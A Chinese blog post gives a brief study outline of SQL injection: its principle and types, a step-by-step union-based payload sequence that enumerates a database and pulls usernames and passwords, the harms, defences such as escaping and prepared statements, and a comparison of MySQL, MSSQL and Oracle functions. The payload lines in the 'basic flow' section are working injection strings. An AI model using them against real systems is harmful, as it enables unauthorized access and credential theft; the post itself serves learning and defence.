SQL注入总结大纲

最新推荐文章于 2023-05-27 14:30:39 发布
最新推荐文章于 2023-05-27 14:30:39 发布
阅读量216 收藏 1
点赞数
分类专栏: SQL注入 Web安全 文章标签: sql mssql sqlserver oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/117607919
版权

SQL注入总结

本文为SQL注入总结简略版,仅仅提供一个思路。详细版后续更新……

SQL注入原理

用户输入不可控,恶意SQL语句被拼接到原因SQL语句中并能够执行,导致SQL注入漏洞

SQL注入分类

数值型、字符型、搜索型
回显注入: union select…
报错注入: extractvalue() 和 updatexml()
堆叠注入:show table、handler table read first
时间盲注、布尔盲注:字符编码+二分法(python)
二次注入:在第一次对数据库操作的基础上,再次进行注入攻击,达到目的

SQL注入基本流程

id=1' order by 3 --+  		       	  //判断出数据库表的字段数为3
id=0' union select 1,2,3 --+  		  //判断输出的位置
id=0' union select 1,2,(select database()) --+  	//爆库名
id=0' union select 1,2,(select group_concat(table_name) 
	from information_schema.tables where table_schema='security') --+       //查security中所有表名
id=0' union select 1,2,(select group_concat(column_name) from information_schema.columns 
	where table_schema='security' and table_name='users') --+ 			//获取列名 
id=0' union select 1,2,(select group_concat(id,0x3a,username,0x3a,password) from security.users) --+   			
	//要明确想要的信息在哪个数据库的哪个表中;获取单元格内的值

SQL注入危害

  1. 数据被泄露、修改、删除等
  2. 写入木马文件,对网页篡改等
  3. 获取操作系统shell,执行系统命令,进行提权操作等
  4. 修改注册表

SQL注入防护

  1. 基于攻击特征的匹配过滤
  2. 对用户输入进行转义
  3. 对用户输入长度,输入内容严格规定
  4. 严格限制网站访问数据库的权限
  5. 预编译。Select、from、where、and等关键字提前编译,后面恶意的SQL语句就不会被执行。
  6. PDO:PHP数据对象。提供一组数据库抽象API,使得php编写者不需要关心连接的数据库,有效解决SQL注入问题

数据库的比较

  1. Mysql弱类型语言,mssql、orcale强类型语言
  2. Mysql的information_schema;mssql的master…sysdatabases;Orcale没有数据库的概念
  3. 函数的区别:| user() | current_user | user |;
mysqlmssqlorcale
user()current_useruser
db_name()database()无数据库概念
length()len()length()
ascii(),char()char()ascii()
limit 0,1top 1rownum=1
substr()substring()substr()
group_concat()group_concat() (与group by联合使用)wm_concat()
  1. 习惯性组合:asp、aspx与mssql;jsp与oracle;php与mysql
  2. 常用关键词区别:Limit | top | rownum ……
Buffedon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入总结
ad12456的博客
03-27 1947
SQL注入
SQL注入基础总结
IerkeU的博客
12-09 4208
一、什么是SQL注入? 答:SQL注入是比较常见的网络攻击方式之一,它不是利用OS的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句实现无账号登陆,甚至篡改数据库。 二、SQL注入的原理? 答:SQL注入攻击通过构建特殊的输入语句作为参数传入web应用程序,指的是服务器对用户输入数据过滤不严,导致服务器SQL语句被恶意篡改并成功 SQL注入的危害? 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。 SQL注入带来的危害主要有如
sql注入学习-知识点大合集
weixin_49349476的博客
05-27 1704
SQL注入是Web应用程序攻击中最常见的攻击方式之一,是影响Web安全的主要问题之一
SQL注入漏洞(1)大纲和原理
weixin_51339377的博客
03-18 380
按照注入方法分类: 1.union select注入 2.报错函数注入法 3.盲注(布尔盲注/时间盲注) 4.堆叠查询注入 注入类型: GET型注入 POST型注入(可以借助burpsuite)(更多的是针对账号和密码这种表单的形式) 1.数字型输入 2.字符型注入 (XX型注入 即("") ('')) 3.搜索型注入(like型) 4.报错函数注入 适用:delete,insert/update 函数:updatexm...
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
Mysql注入(1)——整体大纲
weixin_30294295的博客
06-04 108
学习web安全也快3个月了,从一开始的小白到现在开始了解web渗透的整体流程和一些常见漏洞。现在想写一个整体的Mysql注入的文章,其目的为了复习sql注入的知识点,也想记录我学习的心酸的过程。 整体大纲 1.注入的产生 (1)注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据。 (2)程序在开发的...
SQL注入回顾篇(一)
JBlock的博客
02-28 1629
前言 忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考,历时两个星期,第一系列SQL注入回顾篇出炉!内容分四节发布,其中SQL注入代码审计为两节,WAF绕过总结为1节,SQLMAP使用总结为1节!此为SQL注入代码审计第一部分。欢迎各位斧正,交流! 文章目...
SQL注入之如何检测与判断详细过程
01-31
SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前注入点满大街,一个单引号就可以判断出是否存在注入点。但是如今随着各大厂商越来越注重安全,各种...
SQL入门常见问题总结与实用技巧介绍.docx
最新发布
03-26
以下是一份SQL开发常见技巧的Word大纲格式列表: SQL基础技巧 规范书写: ...在必要时使用参数化查询防止SQL注入,同时保证性能。 适当地使用预编译SQL语句提高执行效率。 存储过程与函数: 编写高
《数据库原理》课程教学大纲.docx
12-17
* 数据库安全威胁:数据库安全威胁包括 SQL注入、跨站脚本攻击、权限escalation等。 * 数据库安全措施:数据库安全措施包括身份验证、访问控制、数据加密、日志记录等。 通过学习数据库原理课程,学生将掌握数据库...
MCA大纲.zip
09-26
15. **软件安全**:学习密码学基础,了解网络安全威胁,如SQL注入和跨站脚本攻击,并学习如何预防。 在面试过程中,面试官可能会询问上述知识的具体细节,所以对这些概念有深入的理解和实际操作经验是非常重要的。...
SQL2005教学内容
09-10
3. **安全设置实战**:模拟真实环境设置用户权限,学习如何防止SQL注入等安全威胁。 4. **备份与恢复演练**:进行数据库备份与恢复操作,体验不同恢复模式下的数据恢复过程。 5. **报表设计**:使用Reporting ...
sql injection 类型总结
qq_24196029的博客
08-16 1356
前言(废话):本人觉得网上对于SQL类型的分析其实有点混乱(特别是中文网站,误导人),后来我发现其实大家都是根据sqlmap上给出的类型来划分的( --technique=BEUSTQ (Boolean, Error, Union, Stacked, Time, Query Inline) 从实际的理解上来说,这样划分是难以理解的,sqlmap的BEUSTQ是它的注入方式,和类型其实没有什么
文件上传之 .htaccess文件getshell
buffedon的博客
07-27 9966
文件上传之 .htaccess文件getshell文件上传之 .htaccess文件getshell.htaccess文件http.conf文件(前提条件)利用htaccess文件getshell源码分析创建.htaccess文件上传.htaccess文件上传一句话木马获取绝对路径蚁剑getshell 文件上传之 .htaccess文件getshell .htaccess文件 在站点的根目录下面,不是在apache目录下 htaccess文件时Apache服务中的一个配置文件,它负责相关目录下的网页配置
SQL注入上传一句话木马
buffedon的博客
05-31 9128
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
FastJson 反序列化漏洞原理分析
buffedon的博客
08-01 8723
FastJson 反序列化漏洞原理分析FastJson 简介漏洞原理FastJson 序列化操作序列化反序列化调用链分析原理利用过程分析RMI 的实现JNDI服务器端代码构造总结1. fastjson 利用过程2. 恶意类怎么上传到服务端3. fastjson rce的原理参考 FastJson 简介 fastjson框架下载:https://github/alibaba/fastjson fastjson-jndi 下载:https://github.com/earayu/fastjson_jndi_po
【Web安全】Ysoserial 简单利用
buffedon的博客
12-30 6523
Ysoserial 的简单使用,包括命令使用与简单原理解释
Java反序列化
buffedon的博客
09-05 4141
Java反序列化Java反序列化概念漏洞原理漏洞危害漏洞出现点漏洞挖掘漏洞防御序列化与反序列化代码参考文章 Java反序列化概念 在说反序列化之前,先说说序列化 序列化就是将对象转化为字节流,利于存储和被引用 反序列化与序列化恰恰相反,是将字节流转化为对象 序列化的格式:json序列化,xml序列化,二进制序列化,SOAP序列化 序列化调用的函数 序列化:java.io.ObjectOutputStream 类中的 writeObject() 实现 Serializable 和 Externaliz
反序列化漏洞汇总
buffedon的博客
07-15 4137
JAVA反序列化、PHP反序列化,场景容器反序列化利用过程
SQL注入漏洞攻防详解:绕过WAF策略
"漏洞知识大纲SQL注入SQL盲注漏洞" 在网络安全领域,了解和防范漏洞至关重要。本文主要探讨了两种常见的数据库攻击技术:SQL注入SQL Injection)和SQL盲注(Blind SQL Injection)。这两种漏洞利用方式是攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值